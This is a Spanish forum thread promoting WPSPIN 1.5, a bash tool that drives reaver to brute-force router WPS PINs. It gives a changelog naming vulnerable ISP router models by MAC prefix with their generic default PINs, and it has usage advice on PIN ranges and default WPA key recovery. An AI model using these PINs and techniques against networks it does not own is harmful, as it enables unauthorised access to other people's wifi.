Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 23, 2014, 19:11:26 pm
estoy ejecutando la aplicacion en wifislax, via maquina virtual en un Mac...

jajaja

algo que ver?

Gracias kcdtv

  Si se ejecuta el scan es que tienes tu maquina virtual bien configurada y rulando como se debe.  ;)
No importa que sea un macintosh, mejor aún para ti ya que tienes potencia y RAM y que no te va a dar problemas con la virtualización 

  El "fallo" que describes ( se ejecuta el scan pero no se rellena la lista con los objetivos ) viene de la mala compilación de unas librerías en wifislax resultando en comandos bash con opciones ausentes.
   Lo más simple es usar una distribución soportada ( probado con exitó  en ubuntu, xubuntu, debian, kali, backtrack5, bugtraq2, lubuntu, linux mint, arch linux, puppy linux, manjaro, mandriva, incluso slax... ) es decir cualquiera.... menos wifislax  :P
   
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: madmartigan en Enero 24, 2014, 15:12:51 pm
Gracias por las respuestas!

Así lo haré

;)

Enero 24, 2014, 17:59:39 pm
probado en maquina virtual con Kali y... ningun problema.

Muchas Gracias!
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 29, 2014, 22:24:23 pm

WPSPIN 1.5



(http://storage5.static.itmages.com/i/14/0124/h_1390599399_6948129_c906504309.png)



WPSPIN vuelve con mejoras y novedades  :)


[img width=540 height=157]http://i.imgur.com/qiTlNsI.png[/img]



Se han integrado tres nuevas opciones en el menú de ataque

  - Introducir otro PIN que el PIN propuesto

Introducimos los 7 primeros dígitos del PIN que queremos probar primero y este se carga para el attaque

   (http://storage7.static.itmages.com/i/14/0124/h_1390601263_7774931_7274b5602f.png)
 
  - Introducir una secuencia de PIN

WPSPIN les preguntara entrar la secuencia sobre la primera mitad de PIN
Si por ejemplo queremos probar primero los PIN que empiezan por 3 pondremos 3000 hasta 3999
Y luego sobre la segunda mitad
No se necesita entrar el checksum asi que son secuencias de 3 dígitos ( ejemplo 200 - 300 )
Podemos pasar de definir una secuencia para la segunda mitad entrando x
 
(http://storage5.static.itmages.com/i/14/0124/h_1390601210_1703581_e8d38e43c5.png)

Podéis añadir varias secuencias las unas después de las otras
Podéis poner secuencias crecientes ( 2000-3000) o decrecientes ( 3000 - 2000) .
Podéis parrar el ataque en cualquier momento para definir como queréis el PIN o los PIN por venir, la idea siendo ofrecer un control total al usuario sobre los PIN por mandar.

  - Modificar su linea de comando reaver

Con esta función podréis jugar con las opciones de reaver.
Las modificaciones se memorizan y estarán empleadas en el próximo ataque

(http://storage8.static.itmages.com/i/14/0124/h_1390601053_2321073_b6557f4887.png)


Y además

Prevención bug 99,99%

si se detecta un M4 o M6 dudoso se hace un backup de la sesión en el punto critico y se advierte al final del ataque.
El usuario podrá así volver atrás sin perder el progreso echo con PIN seguros
También no tendrán mas el típico pin que se tira en bucle con el porcentaje que empieza a 90% hasta 99,9%.
Cuando no se adelanta se quedara en 0 evitando confusiones y fallos.
 
Este es el típico fallo que ocurre usando el opción -p, no se ha probado ninguno PIN pero estamos a mas de 90% del attaque y seguimos subiendo

(http://i.imgur.com/FrMLl1M.png)

Al generar en vivo los PIN usados sin usar el opción -p WPSPIN previene este molesto fallo

(http://i.imgur.com/NrJFPck.png)


Salida mejorada


se informa del progreso efectuado en nuestras sesiones

(http://storage5.static.itmages.com/i/14/0124/h_1390601716_4080786_6d77025a15.png)

Se enseña la llave wpa por defecto si possible ( de momento solo se implemento el arcadyan vodafone de coeman76 )

y varias posibles errores están detalladamente explicados y se busca soluciones

(http://storage6.static.itmages.com/i/14/0128/h_1390925947_9922426_fff526b76a.png)


Compatibilidad MOVISTAR

se recogen las llaves en pocos segundos

(http://storage5.static.itmages.com/i/14/0128/h_1390926144_9077892_89b95b8e01.png)




Y muchos nuevos dispositivos soportados

Se ha integrado el algoritmo para los Vodafone arcadyan incluso la llave WPA  ;)

(http://i.imgur.com/jZECwGP.png)


Por primera vez tenemos soporte WPS para el ISP Orange y sus nuevos HG530s
Por primera vez podemos dar soporte WPS para el ISP OnO y sus routers Hitron
Por primera vez podemos dar soporte WPS para el ISP Movistar y sus routeurs RTA01N_Fase2
WPSPIN llega hasta Africa dando soporte a los HG532e de la republica de djibouti
Y se añade D-Link a la lista de los grandes fabricantes afectados
aquí tenéis el registro de cambios

Citar
# 1.5 ( 24/01/2014 )
#
#        - Imlemented bash adaptation of esay box arcadyan vodane PIN and WPA algorithm by coeman76
#        - Grafic changes and code optimization
#        - New filters for preventing permissions issues, directory issues, unisntalled tools isuues, interfaces issues
#        - Fixed the bug for FTE red 
#        - New option to define a sequence of PIN to try first ( thanks to Spawn for recursive_generator )
#        - New option to enter manually a different PIN then than one proposed
#        - -p option with reaver is not used any longuer due to lost of quality of attack and PIN are genrated live
#        - detection of processing error to backup the sesssion untill the PIN that could create a problem in order to avoid the "99,99% bug"
#        - function to adapt mode monitor managment with RT 3XXX chipsets
#        - Default WPA key is shown once target has been selected if the algorithm for default wpa is known ( still a lot to implement )
#        - prevent reaver failure when saving a sesssion
#        - bash adaptation of arcadyan easy box WPA and PIN generator by coeman76
#        - display the progress of a former sesssion before attacking the target again
#        - option to allow the user to customize the reaver command line
#        - New supported bssid
#             - modification for 08863B with new devices, repeater N300 Dual-Band Wi-Fi Range Extender no compatible, with AP rate limit
#             - new bssid  F81A67 for TD-W8961ND with AP RATE LIMIT
#             - new vodafone-XXXX BSSID = 6296BF 6ACBA8 62:CB:A8 72:CB:A8....
#             - new bssid for PDG4100ND D0:D4:12 with refereed PIN 88202907 
#          - New supported devices
#             - NEW DEVICES, D-LINK, DSL-2730U (bssid = B8A386 | B8A386) & DSL-2750U C8:D3:A3 , with respectively generic PIN 20172527 &  #21464065
#             - NEW DEVICE, ZTE ; ZXHN_H108N , default generic 12345670 bssids: F8:1B:FA & F8:ED:80 default ssid = MOVISTAR_XXXX
#             - 08:7A:4C E8:CD:2D 0C:96:BF NEW DEVICE   Orange-XXXX / HG530s ( Huawei ) 
#             - E4:C1:46 for MOVISTAR_XXXX. Model : Observa Telecom - RTA01N_Fase2 comercialized by Objetivos y Servicios de Valor 
#             - new TP-LINK device affected TD-W8951ND with AP RATE LIMIT and known bssid A0:F3:C1:
#             - the last Bbox, with default ssid Bbox-XXXXXXXX, manufactures by SAMSUNG is vulnerable , known BSSID = 5C:A3:9D DC:71:44 D8:6C:E9
#             - VodafoneXXXX New device for mac 1C:C6:3C 50:7E:5D 74:31:70 84:9C:A6 88:03:55 full disclosure aracadyan PIN-WPA model : ARV7510PW22
#             - HG 532e from djibouti, default ssid HG532e-XXXXXX , mac  EC:23:3D
#             - DG950A from Arris Interactive  L.L.C, mac 00:1D:CF, default SSID ARRIS-XXXX
#             - CDE-30364 from Hiltron - used by spanish ISP OnO with default ssid OnOXXX0 - mac : BC1401 68B6CF 00265B




descarga :


[img width=300 height=104]https://s25.postimg.cc/c7mfwbky7/maripuristore.jpg[/img]



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Enero 29, 2014, 22:48:05 pm
GREAT JOB!!!

(http://i.imgur.com/zBznk0J.gif)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Enero 29, 2014, 22:59:41 pm
Bravo amigo :) este sí que es un post de 5 estrellas:

* * * * *

 ;D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: spantapajaros en Enero 29, 2014, 23:31:32 pm
Dios, que maquina... ya tenemos tarea para el fin de semana   ;D.

Muchas gracias por el curro.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 29, 2014, 23:32:19 pm

Tampoco tenías ganas de acabarla.. eh?   Con las mejoras añadidas (que no son pocas) va gustar un montón    ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carrasco30 en Enero 29, 2014, 23:46:34 pm
gracias tio eres un maquina  ;D ;D ;
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cardi en Enero 30, 2014, 00:17:21 am
probando el nuevo WPSPIN,
 
Y gracias kcdtv
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 30, 2014, 00:27:01 am
Espero que todo salga bien   :D  :P
Lo he probado en kali, xubuntu, slax, mint y arch y bastantes chipsets
En wifislax no va por historias de librerías incompletas  :P
Y Gracias a vosotr@s por toda la tremenda colaboración, sin colaboración no hay nada  ;)
¡A por más!  :D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Enero 30, 2014, 00:28:09 am
Gran trabajo kdctv nose que hariamos sin vosotros lampi, coeman, ziffel, bestis jesus.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: guest48471 en Enero 30, 2014, 11:19:21 am
buenas yo lo probado en wifislax 4.8 se abre la interfaz pero cuando intento  buscar la redes se abre la ventana la busca y encuentra la redes pero al cerrarla me dise que no ha encontrado rredes wps
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: yayo en Enero 30, 2014, 11:32:45 am
buenas yo lo probado en wifislax 4.8 se abre la interfaz pero cuando intento  buscar la redes se abre la ventana la busca y encuentra la redes pero al cerrarla me dise que no ha encontrado rredes wps

En wifislax no va por historias de librerías incompletas...  lo pone mas arriba..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Enero 30, 2014, 13:15:49 pm
Exacto :) hay que mirar siempre de tener un S.O actualizado
saludos :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: larpeiro en Enero 30, 2014, 15:18:29 pm
buenas yo lo probado en wifislax 4.8 se abre la interfaz pero cuando intento  buscar la redes se abre la ventana la busca y encuentra la redes pero al cerrarla me dise que no ha encontrado rredes wps

http://lampiweb.com/foro/index.php/topic,9834.msg86588.html#msg86588
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Fr3dY en Enero 30, 2014, 15:45:24 pm
Espero que todo salga bien   :D  :P
Lo he probado en kali, xubuntu, slax, mint y arch y bastantes chipsets
En wifislax no va por historias de librerías incompletas  :P
Y Gracias a vosotr@s por toda la tremenda colaboración, sin colaboración no hay nada  ;)
¡A por más!  :D

Hola,

¿Cuáles son esas librerías "incompletas"? La 4.8 está en release candidate 1, aún da tiempo a corregir lo que sea necesario y hacerla compatible.



Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: wayout en Enero 30, 2014, 16:47:26 pm
Gran trabajo , se nota apesar de mi ignorancia , que esto lleva muchas horas de curro.Felicidades!!
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 30, 2014, 19:22:09 pm
Citar
¿Cuáles son esas librerías "incompletas"? La 4.8 está en release candidate 1, aún da tiempo a corregir lo que sea necesario y hacerla compatible.

bienvenido al foro  Fr3dY

"Librerías incompletas" no es muy apropiado... "comandos diminutos"?
Gracias por tu interés  :)
No quiero ser pesimista pero no creo que se modifique wifislax justamente para integrar WPSPIN...  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Fr3dY en Enero 30, 2014, 22:24:15 pm
bienvenido al foro  Fr3dY

"Librerías incompletas" no es muy apropiado... "comandos diminutos"?
Gracias por tu interés  :)
No quiero ser pesimista pero no creo que se modifique wifislax justamente para integrar WPSPIN...  ;)

Gracias por la bienvenida!
No seas tan pesimista, según parece en la 4.8rc2 podría funcionar el script directamente ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 31, 2014, 09:19:38 am
Me alegro  ;)

El script esta pensado para poder funciona en cualquier linux que tenga sus comandos fundamentales correctamente implementados con opciones comunes así que no hay ningunas razones para que no funcione

Esto si ; no uso slackware o red hat y por lo tanto el script esta optimizado para sistemas basados en debian y arch linux y solo puedo brindar soporte para estas distribuciones ( privilegio estos dos proyectos  comunitarios con sus derivados que ya son bastantes  :P   :D  )

Se recomienda especialmente [color=purple][b]Kali linux[/b][/color] (debian ) y  [color=red][b]Black arch[/b][/color] ( arch linux ) ya que son configuradas para wireless, y llevan los repositorios mas completos que haya en el ámbito crack y hack
...Sino se recomienda Ubuntu/Xubuntu/Ubuntu/Lubuntu, debian y derivados  o manjaro, arch linux y derivados

En los cuales WPSPIN esta ya soportado; y en todas las versiones ( por lo menos desde las series 11.10 de los ubuntu y derivado, desde la primera kali etc... )


saludos  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: javimalg en Enero 31, 2014, 10:43:16 am
No puedo descargarlo!!, el link esta caido.
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 31, 2014, 10:49:13 am
en efecto, gracias por avisar
pondre en breve un link alternativo   ;)

[time]Enero 31, 2014, 11:00:21 am[/time]


[img width=540 height=86]http://img856..us/img856/7009/rt5d.png[/img]



[img width=540 height=117]http://img811..us/img811/1828/xqh8.png[/img]
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 31, 2014, 15:20:52 pm

Como el servidor está caído añado al primer post un mirror de la lista de soportados online:

lista de bssid soportados (mirror)

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: yojanon en Febrero 02, 2014, 16:51:27 pm
me da una key encriptada la tira de larga solo me pasa con una red y no se por que
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: USUARIONUEVO en Febrero 03, 2014, 00:19:04 am
BUENAS, no se si lo habras corregido , pero el

BSSID hitron 68:B6:FC   , lo tienes mal en la base.

lo tienes al reves al final

68:B6:CF

creo que no afecta al funcionamiento en el calculo del pin , y solo es algo estetico , ya que al estar al reves, dice "desconocido" , y aparece en naranja.

cuando estando bien el BSSID , aparece reconocido y en verde.

repito , no probe si afecta eso al calculo del pin .... 

EDIT:
no me costaba nada asi que probe el calculo de pin , lo hace correcto , asi pues queda en algo "estetico" , naranja , por verde , y que nos de la info del ap , ya que si no dire desconocido al no cudrarle el BSSID.

un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Febrero 03, 2014, 08:58:04 am
me da una key encriptada la tira de larga solo me pasa con una red y no se por que

Como no especifiques poco podemos hacer.... cuando vayas a postear una duda tienes que aportar más datos, una captura de pantalla de tu terminal, un copy-paste, o aunque sea una explicación más concreta, tal y como lo haces tenemos que ejercer de adivinos y no es plan ;)

Saludos y buenos días :)

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 03, 2014, 17:45:02 pm
Muchas gracias por reportar el fallo USUARIONUEVO.  :)
En efecto no afecta el calculo del PIN ya que por defecto para los routeurs desconocidos se pone primero el PIN según el algoritmo fin bssid a decimal + checksum, y lueguo el 12345670, y luego salen los genéricos conocidos
Pero mejor devolver la información exacta ya que se tiene, así que muchas gracias  ;)

Muy pronto un update de wpspingenerator si bien entiendo  ;)

Cita de: yojanon
me da una key encriptada la tira de larga solo me pasa con una red y no se por que

No he entendido nada de nada  :D

Normalmente WPSPIN te devuelve la llave que te da reaver y la guarda en un fichero llamado -essid objetivo-.txt

(http://storage5.static.itmages.com/i/14/0128/h_1390926144_9077892_89b95b8e01.png)



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: karspov en Febrero 03, 2014, 22:58:45 pm
Gracias por el trabajo y tu tiempo de investigación,
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Febrero 04, 2014, 10:23:59 am
kcdtv mi cuenta de ubuntu one está disponible por si quieres subir algo :) (leo por ahí que el link está/estaba caído)
saludos :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 04, 2014, 11:30:05 am
gracias 1camaron1  :)
he puesto dos links de respaldo, uno en mi cuenta ubuntuone y otro en el servidor de crack-wifi.com asi que creo que tengo la espalada cubierta.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Febrero 04, 2014, 19:59:37 pm
Te dejo mp con un pequeño bug que creo a ver encontrado, va mucho mejor que sus anteriores versiones, gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ñanduti en Febrero 09, 2014, 00:12:51 am
disculpa compi no kiero desviar el tema  pero la red de Sitecom  cumple con el el algoritmo de zao la clave es  de 8 diguitos mezcla de letra mayuscula,minuscula y nº en este caso seria SitecomLL WPA2 donde la L son letras  :o  ;D si kieres datos te lo  envio   ;) gracias y un salu2 8)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kostika1 en Febrero 12, 2014, 14:50:01 pm
Gracias por el trabajo excelente programa
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Febrero 12, 2014, 19:00:42 pm
Cita de: ñanduti
la red de Sitecom  cumple con el el algoritmo de zao
SitecomLL WPA2
si kieres datos te lo  envio
¿Puedes hacerme llegar por MP la info.. ? gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 12, 2014, 19:12:28 pm
Les recuerdo que es muy importante saber si el WPS esta activado por defecto, el modelo exacto del router etc... sobre todo cuando es un modelo "nuevo"
Muchas gracias a ti kostika1 por probar y por tus palabras de apoyo  :) 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 16, 2014, 18:58:56 pm
Hola a todos

Gracias por este magnifico programa y por vuestra colaboracion.

Tengo un problema con el programa, debido a que no me aparece todo el menu como bien aparece en el video, y como dijo KCDTV seguro que es por esto

"  Si no tenemos dispositivo wireles compatible o que no tenemos aircrack-ng o reaver instalado (el programa es compatible con reaver 1.3 y 1.4 y se adapta según lo que gastamos), nos encontraremos limitado a una versión reducida de WPSPIN  "

Mi pregunta es que si Backtrak 5 dispone de estos elementos ??

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 16, 2014, 19:46:34 pm
a ver, deberías decir cual es el mensaje exacto que te aparece cuando estas en el menú reducido
por ejemplo si no tienes interfaz compatible te sale algo así

(http://storage5.static.itmages.com/i/14/0216/h_1392575653_6462946_4c5a9ac8a7.png)

Si es porque no tienes privilegios de administrador es asi:

(http://storage5.static.itmages.com/i/14/0216/h_1392575797_6194824_2666ca5362.png)


Si es porque no tienes reaver te dice que no tienes reaver, si es aricrack-ng, te dice que falta aircrack-ng

Como es backtrack ( ¿Que versión? ) diría que
  - O tienes un chipset demasiado moderno y no esta reconocido
  - O no estas situado corectamente es decir en la carpeta WPSPIN. Debe de haber esta carpeta, no la puedes renombrar ya que se necesita para escribir datos.

La idea es tener un script "portable", lo lleváis en su carpeta con los datos recogidos y lo podeis iniciar desde cualquier computadora con un linux adaptado con vuestras sesiones anteriores  echas con WPSPIN.
Me haces pensar en que podría implementar una opción que proponga importar las sesiones echas con reaver y eventualmente fusionar las y acumularas, el problema siendo que las sesiones echas con reaver podrían ser corruptas con un M4-M6 falso y no hay un sistema de back-up hacia el paquete sospecho como con WPSPIN...




Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 17, 2014, 17:23:37 pm
Hola kcdtv


En principio todo funcciona bien  https://.com/i/0vrnq7j


Y despues me aparece esto https://.com/i/5nq65mj

Que podra ser ??
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 17, 2014, 17:38:34 pm

(http://i.imgur.com/iTSSPku.png)

Lo que te dice el mensaje es que debes situarte en la carpeta WPSPIN para lanzar el script
El script debe tener su carpeta llamada WPSPIN, la puedes crear si quieres...
lo hacemos paso a paso de la forma la mas fácil

(http://i.imgur.com/ig8gSjP.png)

(http://i.imgur.com/3d3d3fD.png)

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 17, 2014, 18:32:24 pm
Buhhhh la verdad es que he hecho lo que me has dicho pero nada.

He copiado el programa del MP3 en el Escritorio del BT3 y le he dado click derecho " Open Terminal Here " y a continuacion he escrito el comando " sudo bash wpspin.sh " pero me aparece todo igual que antes. 

Tambien he copiado el mismo fichero y metido en la misma careta pero nada aparece todo igual.

Si intento ejecutarlo desde el MP3 no me aparece la opcion de " Open Terminal Here " por eso lo copie en el Escritorio del BT3

Sino intentare descargarme el BT5 y a ver si asi consigo que funccione  :-\


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Febrero 17, 2014, 18:41:48 pm
Citar
bash WPSPIN.sh

WPSPIN en mayuscula
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 17, 2014, 18:44:58 pm
No lo que pasa es que si lo pongo en Mayuscula no me lo lee me da Error y no me funcciona y si lo pongo en Minuscula si me funcciona el comando

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Febrero 17, 2014, 18:52:18 pm
espera espera Backtrack 3?  :o

uffff....

Actualiza tu distro (Bactrack esta en desuso)...Backtrack es ahora Kali Linux

Tus problemas quizas vengan de ahí
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 17, 2014, 18:54:24 pm
Sera.... Ahora me voy a bajar la ultima version del BT5 la R3 a ver si asi funcciona   :D

Os seguire informado desde la base secreta jaja  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kyrandio en Febrero 17, 2014, 19:04:29 pm
compi, gracias por la actualixzacion!!! k grande!!! :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 18, 2014, 18:46:41 pm
Sera.... Ahora me voy a bajar la ultima version del BT5 la R3 a ver si así funciona   :D

Os seguiré informado desde la base secreta jaja  ;)

funcionna en backtrack 5 rc3
backtrack 3 es demasiado viejo,
no hay compat-wireless ( problemas drivers) no hay reaver .etc...
seran problemas sobre problemas

Kali es el sucesor de backtrack5 rc3 que fue la ultima versión de backtrack
Kali va de lujo y esta actualizado
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 18, 2014, 20:24:37 pm
Hola kcdtv

Gracias por tu respuesta, ya me he bajado el BT5 y me funcciona de lujo.

Pero tengo una duda.

Porque con algunas redes prueba varios pins y con la mia solo 1.

Yo tengo una red WiFiXXXXXX y me dice que el WPS por defecto mio es 44074746 pero no es asi, debido a que mi WPS empieza por 3565XXXX

Entonces porque no prueba con otro que este en la base de datos del programa, o que me genere una lista de posibles WPS

Un Saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 18, 2014, 23:26:54 pm
Tienes que fijarte en el color del PIN propuesto cuando seleccionas tu objetivo.
 si es verde es soportado y es un PIN por defecto

(http://i.imgur.com/DUTz0CC.png)

(http://i.imgur.com/sBsYfom.png)

mirra ahora la salida que obtienes cuando seleccionas un objetivo no soportado

(http://i.imgur.com/eq6TZ99.png)

lees que es un modelo desconocido, el PIN sale como "PIN POSSIBLE"

Mientras que cuando seleccionas (imagen abajo ) un objetivo soportado ves el modelo exacto del dispositivo soportado, tienes información sobre el WPS y lees "PIN(s) POR DEFECTO"

(http://i.imgur.com/cRTg7KP.png)

No hay soporte por los routers WIFI_XXXXXXX ya que se desconoce el algoritmo asi que el PIN debería ser naranja y salirte como "posible"

Citar
Porque con algunas redes prueba varios pins y con la mia solo 1

Lo que hace WPSPIN es simplemente y solamente generar un diccionario completo ordenado, es decir que si no sale el o los PIN predeterminados seguirá con los otros PIN.
Siempre se guarda el progreso echo así que puedes parrar en cualquier momento y probar una secuencia de PIN o un PIN manualmente

Si tu ataque no adelanta es que simplemente no esta funcionando reaver, no prueba PINes y sigues probando el mismo PIN
Lo suyo seria que hagas un copiado pegado de lo que pasa en consola o pongas capturas de pantalla

Las causas de un ataque reaver que no funcione son múltiples y varias y ajenas al script, van de la pobre implementación del WPS por parte del constructor hasta las interferencias del momento y muchas otras causas.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: k2 en Febrero 19, 2014, 00:02:09 am
Ok gracias por la respuesta me quedo clara " Lo que hace WPSPIN es simplemente y solamente generar un diccionario completo ordenado, es decir que si no sale el o los PIN predeterminados seguirá con los otros PIN. "

Si genera un diccionario de posibles PINS pues podria buscarlo yo manualmente a ver si esta mi WPS alli no ??

De todas formas pondre las capturas para que se vea mejor

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: USUARIONUEVO en Febrero 19, 2014, 00:08:31 am
Lo de las aps con ESSID

WiFiXXXXXX

Ya lo reporte yo , incluso envie datos, pero ....

EL SCRIPT LAS MARCA EN VERDE ....y pone claramente SOPORTADA.

¿por que?

todo se reduce a una de esas pocas probabilidades que a veces se dan..

Algunas WiFiXXXXXX  , van con routers Arcadyan de las afectadas por el algoritmo VodafoneXXXX , lo que creo que ocurre , es que el script  las trata como VodafoneXXXX    con ESSID CAMBIADO

DE HECHO , al seleccionarla , la trata como si fuese VodafoneXXXX  , por lo menos en mi caso ..hasta le calcula el ESSID , ..por eso creo que es la confusion , ... solo por que cree que es una Vodafone con ESSID cambiado.


tal vez una regla , ...para las macs Vodafone afectadas , y es que deban cumplir  ESSID Y BSSID , si no se marcasen como dudosa.



@kcdtv

si necesitas algo puedo reenviarte datos.

aunque para tus pruebas creo que te bastaria hacer un scan , y editar la lista de aps ...poniendo a mano uno  WiFiXXXXXX  , con una de las macs Arcadyan , asi podrias trabajar mas rapido.


cuando la selecciono , la convierte a VodafoneXXXX  ,  ... por eso deduzco que eso es loq ue esra pasando ...

una regla mas estricta y verde solo si ESSID + BSSID , si solo uno de ellos otro color o advertencia o algo ...pero verde te leva a pensar que es valida.
(http://fotos.subefotos.com/3c2c4d560b3d1e1ffb1bba81a13d621fo.png)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 19, 2014, 00:28:05 am
Citar
Si genera un diccionario de posibles PINS pues podria buscarlo yo manualmente a ver si esta mi WPS alli no ??

Estará por la linea 4420 mas o menos ya que se proba la decena de PIN genéricos conocidos ( 12345670 etc...) antes de empezar con el resto.
obtendrías la primera mitad al rededor de los 40% del ataque

Tienes en el menú de ataque el opción "definir un rango de PIN"  para por ejemplo tirar primero los PIN de 3000000X a 3500000X etc...

(http://i.imgur.com/rv4qQC4.png)

lo defines y luego al atacar empezaras por dónde indicaste hasta lo que indicaste
Y luego viene el resto de los PIN

(http://i.imgur.com/u5jhTx1.png)

y puedes indicar otro PIN que el propuesto con el opción 2 : entrar un PIN a mano
no hace falta poner el checksum, basta con los 7 primeros digitos del PIN  ;)


(http://i.imgur.com/evBuMLp.png)

Y luego atacas con el PIN que has entrado...


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: yakuza en Marzo 12, 2014, 14:20:16 pm
Buenas no se si le pasa a mas gente, pero cuando selecciono el idoma el programa se queda colgado.Esto me ha pasado la segunda vez que lo e ejecutado.
Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 12, 2014, 14:36:20 pm
A mi no  :D
¿Puedes decir que distribución usas y que son los pasos que sigues?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ohoo en Marzo 12, 2014, 15:28:30 pm
Hola cuando va a apoyar a estos routers: TP-LINK 740 ND, 741ND, 841ND?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 12, 2014, 15:33:12 pm
No lo se...
No tenemos datos sobre estos modelos, si tienes información o datos acerca de estos modelos estaríamos encantados de incluirlos si se puede sacar algo. 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ohoo en Marzo 12, 2014, 15:39:10 pm
ок gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: haroll en Marzo 12, 2014, 15:43:22 pm
Bueno por donde yo vivo hay bastantes de estos modelos,pero decir que de 4 o 5 que he podido observar ninguno coincide el pin y parece ser que no tiene uno genérico si no cada router el suyo,tamb decir que se bloquea el WPS.Si os hace falta información de MAC,ESSID,BSSID,S/N,PIN,y alguna cosa mas que puede servir de ayuda para intentar encontrar alguna relación entre esos datos y el pin que se genera.Me lo decís y los reúno.Un saludo.  :D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
